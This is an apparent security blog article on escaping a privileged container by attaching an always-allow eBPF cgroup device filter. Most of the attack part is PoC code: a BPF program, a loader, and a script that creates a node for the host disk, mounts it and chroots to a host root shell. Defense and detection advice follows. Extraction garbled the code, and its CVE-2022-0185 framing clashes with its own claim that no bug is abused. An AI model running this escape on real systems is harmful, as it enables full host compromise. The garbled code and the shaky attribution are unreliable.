Background
With the widespread adoption of cloud-native technologies, container security has become a critical area of focus. eBPF (extended Berkeley Packet Filter), as a powerful technology that can run sandboxed programs in the Linux kernel, provides unprecedented observability and control, but also introduces new attack surfaces. This article explores how to use eBPF to achieve container escape, inspired by the vulnerability CVE-2022-0185.
Principle of Container Escape
The core of this container escape technique lies in abusing eBPF programs of the BPF_PROG_TYPE_CGROUP_DEVICE type. This type of program is designed to be attached to a cgroup (control group) to filter device access from processes within that cgroup.
The workflow is as follows:
- 1. Loading and Attaching the BPF Program: An attacker with
CAP_BPFcapability (often granted in privileged containers) can load a custom eBPF program into the kernel. - 2. Bypassing Device Access Control: The attacker crafts an eBPF program that always returns
BPF_OK(allow access), effectively disabling the cgroup’s device access control mechanism. - 3. Creating Host Device Nodes: With the device filter bypassed, the attacker can use the
mknodsystem call inside the container to create a device node that corresponds to a host device, for example,/dev/sda1(the host’s hard disk). - 4. Mounting the Host Device and Getting a Shell: The attacker then mounts this newly created device node to a directory within the container. Since this device is the host’s root filesystem, the attacker gains read and write access to the entire host filesystem, leading to a complete container escape and host compromise.
Constructing the PoC
To execute this attack, we need to meet the following prerequisites:
- Possession of
CAP_SYS_ADMINandCAP_BPFcapabilities.CAP_SYS_ADMINis required for mounting, whileCAP_BPFis needed to load and attach eBPF programs. These are commonly available in privileged containers. - The ability to access the root directory of the container’s cgroup, which is necessary for attaching the eBPF program.
Below are the core code snippets for the Proof of Concept (PoC).
1. eBPF Program (bpf_prog.c)
This program is very simple, containing only one function, bpf_allow_device_access, which always returns 1 (BPF_OK), effectively allowing any device access.
c
include
include “bpf_helpers.h”
SEC(“cgroup/dev”)
int bpfallowdeviceaccess(struct bpfcgroupdevctx *ctx) {
// Always allow access
return 1;
}
char _license[] SEC(“license”) = “GPL”;
2. User-space Loader Program (loader.c)
This program is responsible for loading the eBPF program into the kernel and attaching it to the cgroup.
c
include
include
include
include
include
int main(int argc, char **argv) {
if (argc != 3) {
fprintf(stderr, “Usage: %s
return 1;
}
const char *bpf_file = argv[1];
const char *cgroup_path = argv[2];
struct bpf_object *obj;
struct bpf_program *prog;
int prog_fd, cgroup_fd;
obj = bpf_object__open_file(bpf_file, NULL);
// ... error handling ...
bpf_object__load(obj);
// ... error handling ...
prog = bpf_object__find_program_by_name(obj, "bpf_allow_device_access");
prog_fd = bpf_program__fd(prog);
cgroup_fd = open(cgroup_path, O_RDONLY);
// ... error handling ...
bpf_prog_attach(prog_fd, cgroup_fd, BPF_CGROUP_DEVICE, 0);
// ... error handling ...
printf("eBPF program attached successfully!\n");
close(cgroup_fd);
bpf_object__close(obj);
return 0;
}
3. Attack Script (exploit.sh)
This script automates the entire attack process.
bash
!/bin/bash
1. Compile the eBPF program and the loader
clang -O2 -target bpf -c bpfprog.c -o bpfprog.o
clang loader.c -lbpf -o loader
2. Run the loader to attach the eBPF program to the cgroup root
The cgroup path might differ based on the system
CGROUPPATH=/sys/fs/cgroup/unified
./loader bpfprog.o $CGROUP_PATH
3. Create a device node for the host’s primary disk
mknod /tmp/host_disk b 8 1
4. Mount the host disk
mkdir /tmp/hostfs
mount /tmp/hostdisk /tmp/host_fs
5. Get a root shell on the host
chroot /tmp/host_fs /bin/bash
PoC Code Analysis
bpf_prog.c: TheSEC("cgroup/dev")macro specifies that this is a cgroup device filter program. The kernel ensures it is attached to the correct hook point.loader.c: First, it loads the compiled eBPF program usingbpf_prog_load. Then, it opens the cgroup path (e.g.,/sys/fs/cgroup/unified) and usesbpf_prog_attachto attach the program to theBPF_CGROUP_DEVICEhook.exploit.sh: The script begins by compiling the C code. It then executes the loader to attach the eBPF program. Themknodcommand creates a block device file namedhost_diskwith major number 8 and minor number 1, which typically corresponds to/dev/sda1on the host. Finally, it mounts this device and useschrootto gain a root shell on the host system.
Defense and Detection
To defend against and detect this type of eBPF-based container escape, consider the following measures:
- 1. Principle of Least Privilege: Avoid running containers with unnecessary capabilities, especially
CAP_BPFandCAP_SYS_ADMIN. Do not run containers in privileged mode unless absolutely necessary. - 2. Seccomp/AppArmor: Use security profiles like Seccomp or AppArmor to restrict system calls. Specifically, you can block the
bpf()andmknod()system calls for containers that do not need them. - 3. Monitor eBPF Program Loading: Use kernel auditing or security tools like Falco or Tetragon to monitor the loading of new eBPF programs, especially
BPF_PROG_TYPE_CGROUP_DEVICEtypes. Alert on suspicious activity. - 4. Kernel Version: Keep the host kernel updated. While this specific technique abuses a feature rather than a bug, newer kernels may introduce stricter checks or mechanisms to mitigate such abuse.
Conclusion
eBPF is a double-edged sword. While it provides powerful capabilities for system observability and networking, it also introduces potent new attack vectors. This container escape method demonstrates how a feature designed for security (cgroup device filtering) can be subverted to compromise the host. For cloud-native environments, it is crucial to adopt a defense-in-depth strategy, combining strict permission management, runtime security monitoring, and proactive vulnerability management to ensure container and host security.
